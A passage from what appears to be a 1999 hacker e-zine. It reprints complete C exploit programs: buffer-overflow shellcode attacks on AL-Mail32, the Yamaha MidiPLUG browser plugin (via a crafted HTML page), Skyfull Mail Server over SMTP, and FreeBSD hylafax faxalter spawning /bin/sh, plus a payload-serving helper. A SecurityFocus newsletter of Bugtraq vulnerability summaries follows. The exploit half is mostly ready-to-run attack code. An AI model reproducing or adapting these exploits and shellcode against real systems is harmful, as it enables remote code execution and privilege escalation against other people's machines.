strcat(exploit_code,TARGET_FILE);
p1=(unsigned int)LoadLibrary;
p2=(unsigned int)GetProcAddress;
exploit_code[0x0d]=p1&0xff;
exploit_code[0x0e]=(p1>>8)&0xff;
exploit_code[0x0f]=(p1>>16)&0xff;
exploit_code[0x10]=(p1>>24)&0xff;
exploit_code[0x1e]=p2&0xff;
exploit_code[0x1f]=(p2>>8)&0xff;
exploit_code[0x20]=(p2>>16)&0xff;
exploit_code[0x21]=(p2>>24)&0xff;
exploit_code[0x2a]=strlen(TARGET_FILE);
memcpy(buf+RETADR+4+STACK_BYTES,exploit_code,strlen(exploit_code));
sprintf(packetbuf,CONTENT,buf);
send(sock,packetbuf,strlen(packetbuf),0);
send_smtpcmd(sock,".\r\n");
closesocket(sock);
printf("Done.\n");
return FALSE;
}
@HWA
12.0 AL-Mail32 Version 1.10 Exploit for Windows98/Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
AL-Mail32 Version 1.10 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#define HEADER1 \
"From hehehe@hohoho.com Sat Jul 32 25:01 JST 1999\n"\
"Message-ID: <001_The_ShadowPenguinSecurity_@rockhopper>\n"
#define HEADER2 \
"Content-Transfer-Encoding: 7bit\n"\
"X-Mailer: PenguinMailer Ver1.01\n"\
"Content-Type: text/plain; charset=US-ASCII\n"\
"Content-Length: 6\n"\
"\n"\
"hehe\n"
#define RETADR 260
#define JMPADR 256
#define JMPOFS 6
#define JMP_EBX_ADR 0xbff7a06b
#define CMDLENP 0x43
#define BUFEND 5000
#define FUNC "msvcrt.dll.system.exit."
#define JMPS 0xeb
#define NOP 0x90
unsigned char exploit_code[200]={
0xEB,0x4D,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,
0xB8,0x27,0x6E,0xF7,0xBF,0x40,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x04,0x88,0x23,0xB8,0x27,0x6E,0xF7,0xBF,0x40,0xFF,0xD0,0x8B,0xF8,0x43,
0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,0xFF,0xD7,0xE8,
0xAE,0xFF,0xFF,0xFF,0x00
};
main(int argc,char *argv[])
{
FILE *fp;
static char buf[10000];
int i,r,ip;
if (argc!=3){
printf("usage : %s MailSpoolDirectry WindowsCommand\n",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL){
printf("Permittion denied :-P\n");
exit(1);
}
fwrite(HEADER1,1,strlen(HEADER1),fp);
memset(buf,NOP,BUFEND);
strcat(exploit_code,FUNC);
strcat(exploit_code,argv[2]);
exploit_code[CMDLENP]=strlen(argv[2]);
strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
ip=JMP_EBX_ADR;
buf[JMPADR] =0xeb;
buf[JMPADR+1]=0x06;
buf[RETADR+3]=0xff&(ip>>24);
buf[RETADR+2]=0xff&(ip>>16);
buf[RETADR+1]=0xff&(ip>>8);
buf[RETADR] =ip&0xff;
buf[BUFEND] =0;
fprintf(fp,"Reply-To: \"%s\" <hehehe@hohoho.com>\n",buf);
fprintf(fp,"From: \"%s\" <hehehe@hohoho.com>\n",buf);
fwrite(HEADER2,1,strlen(HEADER2),fp);
fclose(fp);
}
@HWA
13.0 YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <windows.h>
#define MAXBUF 700
#define RETADR 256
unsigned int mems[]={
0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
0xbffc9000,0xbffe3000,0,0};
unsigned char exploit_code[200]={
0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80,
0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28,
0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03,
0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7,
0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00
};
unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE";
unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
unsigned char c1,unsigned char c2)
{
unsigned char *p;
unsigned int adr;
for (p=st;p<ed;p++)
if (*p==c1 && *(p+1)==c2){
adr=(unsigned int)p;
if ((adr&0xff)==0) continue;
if (((adr>>8)&0xff)==0) continue;
if (((adr>>16)&0xff)==0) continue;
if (((adr>>24)&0xff)==0) continue;
return(adr);
}
return(0);
}
main(int argc,char *argv[])
{
FILE *fp;
unsigned int i,ip;
unsigned char buf[MAXBUF];
if (argc<2){
printf("usage %s output_htmlfile\n",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
fprintf(fp,"<HTML><EMBED\nTYPE=\"audio/midi\"\nWIDTH=150\nHEIGHT=40\nAUTOSTART=TRUE\nTEXT=\"");
for (i=0;;i+=2){
if (mems[i]==0){
printf("Can not find jmp code.\n");
exit(1);
}
if ((ip=search_mem(fp,(unsigned char *)mems[i],
(unsigned char *)mems[i+1],0xff,0xe0))!=0) break;
}
printf("Jumping address : %x\n",ip);
memset(buf,0x90,MAXBUF);
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strcat(exploit_code,cmdbuf);
memcpy(buf,exploit_code,strlen(exploit_code));
buf[MAXBUF]=0;
fprintf(fp,"%s\"\n>\n</HTML>",buf);
fclose(fp);
printf("%s created.\n",argv[1]);
return FALSE;
}
@HWA
14.0 Skyfull Mail Server Version 1.1.4 Exploit/Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote Windows98 exploit from http://www.hack.co.za/
/*=============================================================================
Skyfull Mail Server Version 1.1.4 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#define MAXBUF 3000
#define RETADR 655
#define JMPADR 651
#define SMTP_PORT 25
#define JMPEAX_ADR 0xbfe0a035
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";
main(int argc,char *argv[])
{
SOCKET sock;
SOCKADDR_IN addr;
WSADATA wsa;
WORD wVersionRequested;
unsigned int ip,p1,p2;
static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000];
struct hostent *hs;
if (argc<2){
printf("usage: %s VictimHost\n",argv[0]); return -1;
}
wVersionRequested = MAKEWORD( 2, 0 );
if (WSAStartup(wVersionRequested , &wsa)!=0){
printf("Winsock Initialization failed.\n"); return -1;
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
printf("Can not create socket.\n"); return -1;
}
addr.sin_family = AF_INET;
addr.sin_port = htons((u_short)SMTP_PORT);
if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n"); return -1;
}
addr.sin_family = hs->h_addrtype;
memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
printf("Can not connect to specified host.\n"); return -1;
}
recv(sock,packetbuf,MAXBUF,0);
printf("BANNER FROM \"%s\" : %s\n",argv[1],packetbuf);
memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
ip=JMPEAX_ADR;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR ]=0xeb;
buf[JMPADR+1]=0x80;
strcat(exploit_code,cmdbuf);
p1=(unsigned int)LoadLibrary;
p2=(unsigned int)GetProcAddress;
exploit_code[0x0d]=p1&0xff;
exploit_code[0x0e]=(p1>>8)&0xff;
exploit_code[0x0f]=(p1>>16)&0xff;
exploit_code[0x10]=(p1>>24)&0xff;
exploit_code[0x1e]=p2&0xff;
exploit_code[0x1f]=(p2>>8)&0xff;
exploit_code[0x20]=(p2>>16)&0xff;
exploit_code[0x21]=(p2>>24)&0xff;
memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"HELO UNYUN\n");
send(sock,packetbuf,strlen(packetbuf),0);
recv(sock,packetbuf,MAXBUF,0);
printf("HELO: Reply from \"%s\" : %s\n",argv[1],packetbuf);
sprintf(packetbuf,"MAIL FROM: UNYUN <%s@shadowpenguin.net>\r\n",buf);
send(sock,packetbuf,strlen(packetbuf),0);
closesocket(sock);
printf("Done.\n");
return FALSE;
}
@HWA
15.0 Exploit Translation Server Version1.00/Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.hack.co.za
/*=============================================================================
Exploit Translation Server Version1.00
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT_NUM 7000
#define BUFSIZE 1000
#define SENDFILE "xtcp.exe"
int get_connection(port, listener)
int port;
int *listener;
{
struct sockaddr_in address,acc;
int listening_socket,connected_socket;
int reuse_addr=1,acclen=sizeof(acc);
memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, SOCK_STREAM, 0);
if (listening_socket < 0) {
perror("socket"); exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
(void *)&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,
sizeof(address))<0){
perror("bind"); exit(1);
}
listen(listening_socket, 5);
connected_socket=accept(listening_socket,
(struct sockaddr *)&acc,&acclen);
return connected_socket;
}
int main(argc, argv)
int argc;
char *argv[];
{
int sock,listensock,i,r,l;
char buf[BUFSIZE];
struct stat st;
FILE *fp;
if ((fp=fopen(SENDFILE,"rb"))==NULL){
printf("File not found \"%s\"\n",SENDFILE);
exit(1);
}
stat(SENDFILE,&st);
r=st.st_size/BUFSIZE+1;
sock = get_connection(PORT_NUM, &listensock);
for (i=0;;i++){
l=fread(buf,1,BUFSIZE,fp);
if (l<=0) break;
write(sock,buf,l);
}
fclose(fp);
close(sock);
}
@HWA
16.0 Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.hack.co.za/
/*
* Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp)
* Brock Tellier btellier@usa.net
*/
#include <stdio.h>
char shell[]= /* mudge@lopht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
main (int argc, char *argv[] ) {
int x = 0;
int y = 0;
int offset = 0;
int bsize = 4093; /* overflowed buf's bytes + 4(ebp) + 4(eip) + 1 */
char buf[bsize];
int eip = 0xbfbfcfad;
if (argv[1]) {
offset = atoi(argv[1]);
eip = eip + offset;
}
fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
for ( x = 0; x < 4021; x++) buf[x] = 0x90;
fprintf(stderr, "NOPs to %d\n", x);
for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
fprintf(stderr, "Shellcode to %d\n",x);
buf[x++] = eip & 0x000000ff;
buf[x++] = (eip & 0x0000ff00) >> 8;
buf[x++] = (eip & 0x00ff0000) >> 16;
buf[x++] = (eip & 0xff000000) >> 24;
fprintf(stderr, "eip to %d\n",x);
buf[bsize - 1]='\0';
execl("/usr/local/bin/faxalter", "faxalter", "-m", buf, NULL);
}
@HWA
17.0 Security Focus Newsletters #14 and 15
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SecurityFocus.com Newsletter #14 & 15
Table of Contents:
I. INTRODUCTION
1. New Staff at SecurityFocus.com
2. Elias Levy on National Public Radio
II. BUGTRAQ SUMMARY
1. Multiple Vendor CDE dtappgather Vulnerabilities (Update)
2. Canna subsystem 'uum' Buffer Overflow Vulnerability
3. Canna subsystem 'canuum' Buffer Overflow Vulnerability
4. Microsoft IE Yamaha MidiPlug Buffer Overflow Vulnerability
5. BTD Zom-Mail Buffer Overflow Vulnerability
6. AN-HTTPd CGI Vulnerabilities
8. Hylafax 'faxalter' Buffer Overflow Vulnerability
9. Microsoft IE window.open Redirect Vulnerability
10. Real Server Administrator Port Buffer Overflow Vulnerability
11. NT Spoolss.exe Buffer Overflow Vulnerabilities
12. NT Spoolss.exe DLL Insertion Vulnerability
13. Cobalt RaQ2 cgiwrap Vulnerability
14. Alibaba Multiple CGI Vulnerabilties
15. MS ActiveX CAB File Execution Vulnerability
16. Byte Fusion BFTelnet Long Username DoS Vulnerability
17. FTGate Directory Traversal Vulnerability
18. Etype Eserv Directory Traversal Vulnerability
19. Sendmail Socket Hijack Vulnerability
20. Guestbook CGI Remote Command Execution Vulnerability
21. Artisoft XtraMail Multiple DoS Vulnerabilities
22. BigIP Config UI Vulnerabilities
23. Microsoft IE for Win98 file:// Buffer Overflow Vulnerability
24. Seyon Relative Path Vulnerability
25. IrfanView32 Image File Buffer Overflow Vulnerability
26. Linux nfsd Remote Buffer Overflow Vulnerability
27. TransSoft Broker User Name Buffer Overflow Vulnerability
28. Windows 95/98 UNC Buffer Overflow Vulnerability
29. RedHat Linux csh/tcsh Vulnerability
30. Immunix StackGuard Evasion Vulnerability
31. InterScan VirusWall Long HELO Buffer Overflow Vulnerability
32. Multiple BIND Vulnerabilities
33. IMail POP3 Buffer Overflow Denial of Service Vulnerability
34. NetCPlus SmartServer3 POP Buffer Overflow Vulnerability
35. Microsoft ActiveX Error Message Vulnerability
36. MacOS9 NDS Client Inherited Login Vulnerability
III. PATCH UPDATES
1. Vulnerability Patched: WFTPD Remote Buffer Overflow Vulnerability
2. Vulnerability Patched: InterScan VirusWall Long HELO Buffer Overflow Vulnerability
3. Vulnerability Patched: Windows 95/98 UNC Buffer Overflow Vulnerability
4. Vulnerability Patched: Multiple BIND Vulnerabilities
5. Vulnerability Patched: IrfanView32 Image File Buffer Overflow Vulnerability
6. Vulnerability Patched: Linux nfsd Remote Buffer Overflow Vulnerability
7. Vulnerability Patched: Cobalt RaQ2 cgiwrap Vulnerability
8. Vulnerability Patched: MS ActiveX CAB File Execution Vulnerability
9. Vulnerability Patched: Immunix StackGuard Evasion Vulnerability
10. Vulnerability Patched: IMail POP3 Buffer Overflow Denial of Service Vulnerability
11. Vulnerabilities Patched: NT Spoolss.exe Buffer Overflow Vulnerabilities and NT
Spoolss.exe DLL Insertion Vulnerability
12. Vulnerability Patched: FTGate Directory Traversal Vulnerability
13. Vulnerability Patched: AN-HTTPd CGI Vulnerabilities
14. Vulnerability Patched: IBM HomePagePrint Buffer Overflow Vulnerability
IV. INCIDENTS SUMMARY
1. possible trojan/virus issue solved (Thread)
2. port 109 (Thread)
3. Re: Logging hosts (Thread)
4. Mail-relaying probing (Thread)
V. VULN-DEV RESEARCH LIST SUMMARY
1. Re: FreeBSD listen() (Thread)
2. ssh-1.2.27 remote buffer overflow - exploitable (Thread)
3. Re: thttpd 2.04 stack overflow (Thread)
4. MS Outlook javascript parsing bug (Thread)
5. Re: Open Port on Win98 box (Thread)
6. minor (?) mc bug (Thread)
7. [Fwd: [Fwd: ICQ 2000 trojan/worm (VD#5)]] (Thread)
VI. SECURITY JOBS
Seeking Staff:
1. Information Security Consultant(s) - #111 - NJ
2. Information Security Analyst - #253 - NJ
3. Sr Firewall Engineer Position
4. Sr. Mgr. Systems Security
5. Security Sales Nationwide
6. Sr. Mgr. Systems Security
7. Software Engineer #4 - Atlanta, GA
8. Website password-protection scripts programmer needed
VII. SECURITY SURVEY RESULTS
VIII. SECURITY FOCUS TOP 6 TOOLS
1. Security Focus Pager (NT/98)
2. Snoot 1.3.1 (UNIX)
3. BUGS 2.0.1 (NT/UNIX)
4. NSS Narr0w Security Scanner (PERL)
5. cgi-check99 v0.3 0.3 (NT/UNIX)
6. guard (UNIX)
IX. SPONSOR INFORMATION - NT OBJECTives, Inc.
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
I. INTRODUCTION
-----------------
Welcome to the Security Focus 'week in review' newsletter issues 14 & 15 sponsored by NT OBJECTives, Inc.
<http://www.ntobjectives.com>. Issue 14 as you may have guessed failed to
be delivered. It seems to have been eaten by a somewhat overworked
Listserver. The last two weeks have been two of the bussiest in Bugtraq's
history with 36 vulnerabilities being published over the list.
1. New Staff at SecurityFocus.com
---------------------------------
We would like to take this opportunity to welcome two newcomers to the
SecurityFocus.com team. Joining us are Stephanie Fohn as the Chief
Operating Officer at SecurityFocus.com (sfohn@securityfocus.com) and Chip
Mesec as the VP of Marketing.
Stephanie Fohn - COO
--------------------
Stephanie has a broad base of management and entrepreneurial experience,
with particular expertise in the Internet security area. Most recently,
she served as an interim senior management consultant, filling roles such
as Vice President of Marketing for Tripwire Security Systems and Director
of Distribution Partnerships for Infoseek.
Previously, Stephanie served as director of business development and
marketing for Pilot Network Services, Inc., a provider of secure Internet
access for corporations. Prior to joining Pilot, Stephanie spent six years
in venture capital and investment banking in the technology arena.
Stephanie holds an M.S. degree in management from Massachusetts
Institute of Technology and bachelor's degrees in business and psychology
from University of Washington.
Chip Mesec - VP Marketing
-------------------------
Chip Mesec is responsible for Product and Corporate Marketing at
SecurityFocus.com. Prior to joining SecurityFocus.com, Chip was the VP of
Marketing with Cyber SIGN Inc., a company that marketed electronic
biometric signatures. He has over 12 years of computer security and
network experience with positions as Director of Product Management for
Security Products at Network Associates Inc., and five years of Product
Management and Marketing manager for Network General Corporation, which
merged with McAfee Associates to form Network Associates. Prior to joining
Network General, Chip served as a development engineer on PC and
networking hardware products at AT&T Bell Laboratories.
2. Elias Levy on National Public Radio
--------------------------------------
Elias Levy, aka Aleph One, was interviewed on National Public Radio on the
topic of "Cyber Terrorism". RealAudio file available at:
http://www.npr.org/ramfiles/me/19991112.me.10.ram
II. BUGTRAQ SUMMARY 1999-11-02 to 1999-11-14
---------------------------------------------
1. Multiple Vendor CDE dtappgather Vulnerabilities
BugTraq ID: 131
Remote: No
Date Published: 1999-11-03
Relevant URL:
http://www.securityfocus.com/bid/131
Summary:
Due to improper checking of ownership, the dtappgather utility shipped
with the Common Desktop Environment allows arbitrary users to overwrite
any file present on the filesystem, regardless of the owner of the file.
dtappgather uses a directory of permissions 0777 to create temporary
files used by each login session.
/var/dt/appconfig/appmanager/generic-display-0 is not checked for
existence prior to the opening of the file by dtappgather, and as such, if
a user were to create a symbolic link from this file to another on the
filesystem, the permissions of this file would be changed to 0666.
An additional bug exists whereby dtappgather blindly uses the contents of
the DTUSERSESSION environment variable. By setting this variable to point
to a file on the filesystem, its permissions can also be changed. As this
command takes place relative to the /var/dt/appconfig directory, a series
of '..' are required to establish the root directory, after which any file
can be altered.
2. Canna subsystem 'uum' Buffer Overflow Vulnerability
BugTraq ID: 757
Remote: No
Date Published: 1999-11-02
Relevant URL:
http://www.securityfocus.com/bid/757
Summary:
Canna is a Japanese input system available as free software. Canna
provides a unified user interface for inputting Japanese.
Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be
used by a single customization file, romaji-to-kana conversion rules and
conversion dictionaries, and input Japanese in the same way.
Canna converts kana to kanji based on a client-server model and supports
automatic kana-to-kanji conversion.
The Canna subsystem on certain UNIX versions contains a buffer overflow in
the 'uum' program. Uum is a Japanese input tty frontend for Canna.
Regrettably, certain versions are vulnerable to a buffer overflow attack
via unchecked user supplied data with the '-D' option. Since 'uum' is
installed as SUID root this may result in a root level compromise.
3. Canna subsystem 'canuum' Buffer Overflow Vulnerability
BugTraq ID: 758
Remote: No
Date Published: 1999-11-02
Relevant URL:
http://www.securityfocus.com/bid/758
Summary:
Canna is a Japanese input system available as free software. Canna
provides a unified user interface for inputting Japanese.
Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be
used by a single customization file, romaji-to-kana conversion rules and
conversion dictionaries, and input Japanese in the same way.
Canna converts kana to kanji based on a client-server model and supports
automatic kana-to-kanji conversion.
The Canna subsystem on certain UNIX versions contains a buffer overflow in
the 'canuum' program. Canuum is a Japanese input tty frontend for Canna
using uum. Certain versions have a buffer overflow via unchecked user
supplied data in the -k,-c,-n options.
Since this program is installed SUID root this attack will result in a root level compromise.
4. Microsoft IE Yamaha MidiPlug Buffer Overflow Vulnerability
BugTraq ID: 760
Remote: Yes
Date Published: 1999-11-02
Relevant URL:
http://www.securityfocus.com/bid/760
Summary:
There is a buffer overflow in the MidiPlug that may allow arbitrary code
to be executed on the local host. This overflow occurs if a long "Text"
variable is specified within an EMBED tag in a web page. Instructions in
the text variable may be executed when a user visits the malicious web
page.
5. BTD Zom-Mail Buffer Overflow Vulnerability
BugTraq ID: 761
Remote: Yes
Date Published: 1999-11-02
Relevant URL:
http://www.securityfocus.com/bid/761
Summary:
In certain versions of the BTD Zom-Mail server there exists a buffer
overflow which may be remotely exploitable by malicious users. The problem
in question is in the handling of overly (past 256 chars) long file names
for file attachments.
6. AN-HTTPd CGI Vulnerabilities
BugTraq ID: 762
Remote: Yes
Date Published: 1999-11-02
Relevant URL:
http://www.securityfocus.com/bid/762
Summary:
Certain versions of the AN-HTTPd server contain default CGI scripts that
allow code to be executed remotely. This is due to poor sanity checking on
user supplied data.
7. IBM HomePagePrint Buffer Overflow Vulnerability
BugTraq ID: 763
Remote: Yes
Date Published: 1999-11-02
Relevant URL:
http://www.securityfocus.com/bid/763
Summary:
Certain versions of the IBM Web page printout software "IBM HomePagePrint
" can in some instances be remotely exploited by malicious webservers. The
problem lies in a buffer overflow in the code which handles IMG_SRC tags.
If a page containing a specially constructed IMG SRC tag is previewed or
printed using the IBM HomePagePrint software, arbitrary code can be run on
the client.
8. Hylafax 'faxalter' Buffer Overflow Vulnerability
BugTraq ID: 765
Remote: No
Date Published: 1999-11-03
Relevant URL:
http://www.securityfocus.com/bid/765
Summary:
Hylafax is a popular fax server software package designed to run on
multiple UNIX operating systems. Some versions of Hylafax ship with a
vulnerable sub program 'faxalter'. This program is installed SUID UUCP and
has a buffer overflow which if exploited will allow a malicious user to
gain UUCP privileges.
Because the important programs are executed as root, such as Minicom (a
popular modem terminal program) or cu(1) and are in the UUCP group and
therefore writable by the same group they could be trojaned by the
attacker. A successful scenario in this event would lead to a root
compromise.
9. Microsoft IE window.open Redirect Vulnerability
BugTraq ID: 766
Remote: Yes
Date Published: 1999-11-04
Relevant URL:
http://www.securityfocus.com/bid/766
Summary:
If window.open is called with a target URL that redirects to a client-side
file and then a variable is created pointing to the contents of the new
window, the contents of the new window (the local file) can be read and
possibly manipulated or transmitted by other code in the webpage.
10. Real Server Administrator Port Buffer Overflow Vulnerability
BugTraq ID: 767
Remote: Yes
Date Published: 1999-11-04
Relevant URL:
http://www.securityfocus.com/bid/767
Summary:
At installation, the Real Server software randomly selects an unused port
as the remote administration port. This port is used by Real Server's
remote web administration feature. To access this feature, the correct
port must be specified and a valid username/password pair must be entered.
By sending a long response to this authentication request, the buffer can
be overwritten and arbitrary code can be executed on the server.
11. NT Spoolss.exe Buffer Overflow Vulnerabilities
BugTraq ID: 768
Remote: Yes
Date Published: 1999-11-04
Relevant URL:
http://www.securityfocus.com/bid/768
Summary:
Spoolss.exe, AKA the spooler service, which handles all print requests for
the NT operating system, has a number of APIs with unchecked buffers. Some
of these can only be executed by Power Users or Administrators, but some
are accessible to all authenticated users. Many of the overflows will
write directly into the EIP register, meaning that an exploit could be
created to run arbitrary code as SYSTEM.
12. NT Spoolss.exe DLL Insertion Vulnerability
BugTraq ID: 769
Remote: No
Date Published: 1999-11-04
Relevant URL:
http://www.securityfocus.com/bid/769
Summary:
The spooler service (spoolss.exe) allows local users to add their own dll
files and have the spooler run them at SYSTEM level. This could lead to
privilege escalation all the way up to Administrator level. The problem is
in the function AddPrintProvider().
13. Cobalt RaQ2 cgiwrap Vulnerability
BugTraq ID: 777
Remote: No
Date Published: 1999-11-08
Relevant URL:
http://www.securityfocus.com/bid/777
Summary:
Cobalt RaQ2 servers come with a program called "cgiwrap", which acts as a
wrapper for cgi programs so that they run with the uid of their user
instead of ' nobody'. It may be possible to cause a denial of service to
websites hosted on the server or compromise web data.
cgiwrap interprets subdirectories of web/ in which cgi scripts are run as
user directories, and if a user is created which happens to have the same
name as the directory which scripts run from - cgiwrap will try to run a
file that doesn't exist in that user's directory. In a worse case, a
script can be substituted and important data submitted to web forms
compromised.
14. Alibaba Multiple CGI Vulnerabilties
BugTraq ID: 770
Remote: Yes
Date Published: 1999-11-03
Relevant URL:
http://www.securityfocus.com/bid/770
Summary:
There are several CGI programs that ship with the Alibaba webserver. Many
of these do not do proper input handling, and therefore will allow
requests for access to files outside of normal or safe webserver practice.
This results in various situations where an attacker can view, overwrite,
create and delete files anywhere on the server.
15. MS ActiveX CAB File Execution Vulnerability
BugTraq ID: 775
Remote: Yes
Date Published: 1999-11-08
Relevant URL:
http://www.securityfocus.com/bid/775
Summary:
A vulnerability in Outlook and Outlook Express allows remote malicious
users to execute arbitrary code on the user's machine if Javascript is
enabled.
A malicious user can create an executable file, compress it into a cab
file, and rename it to have a multimedia file extension (e.g. .MID). He
can then send this file as an attachment to an Outlook user as well as
some Javascript code. When the user double-clicks on the on the multimedia
attachment it will save the executable file in a known location on the
system. The Javascript will then execute the attachment on the target
machine.
16. Byte Fusion BFTelnet Long Username DoS Vulnerability
BugTraq ID: 771
Remote: Yes
Date Published: 1999-11-03
Relevant URL:
http://www.securityfocus.com/bid/771
Summary:
BFTelnet, a telnet server for Windows NT by Byte Fusion, will crash if a
user name of 3090 or more characters is supplied.
17. FTGate Directory Traversal Vulnerability
BugTraq ID: 772
Remote: Yes
Date Published: 1999-11-04
Relevant URL:
http://www.securityfocus.com/bid/772
Summary:
Certain versions of the FTGate Advanced Mail Server have a vulnerability
in their web based administration interface. The vulnerability is that the
webserver allows users to traverse the directory structure outside of the
Webroot directory.
Therefore malicious users may read files outside of their permitted areas,
including but not limited to private email and password files.
18. Etype Eserv Directory Traversal Vulnerability
BugTraq ID: 773
Remote: Yes
Date Published: 1999-11-04
Relevant URL:
http://www.securityfocus.com/bid/773
Summary:
Etype's Eserv product is designed to be a one-source internet connectivity
solution, incorporating mail, web, ftp, and proxy servers into one
package. The web server will allow remote browsing of the entire
filesystem by the usage of ../ strings in the URL. This gives an attacker
read access to every file on the server's filesystem that the webserver
has access to.
19. Sendmail Socket Hijack Vulnerability
BugTraq ID: 774
Remote: No
Date Published: 1999-11-05
Relevant URL:
http://www.securityfocus.com/bid/774
Summary:
Through exploiting a combination of seemingly low-risk vulnerabilities in
sendmail, it is possible for a malicious local user to have an arbitrary
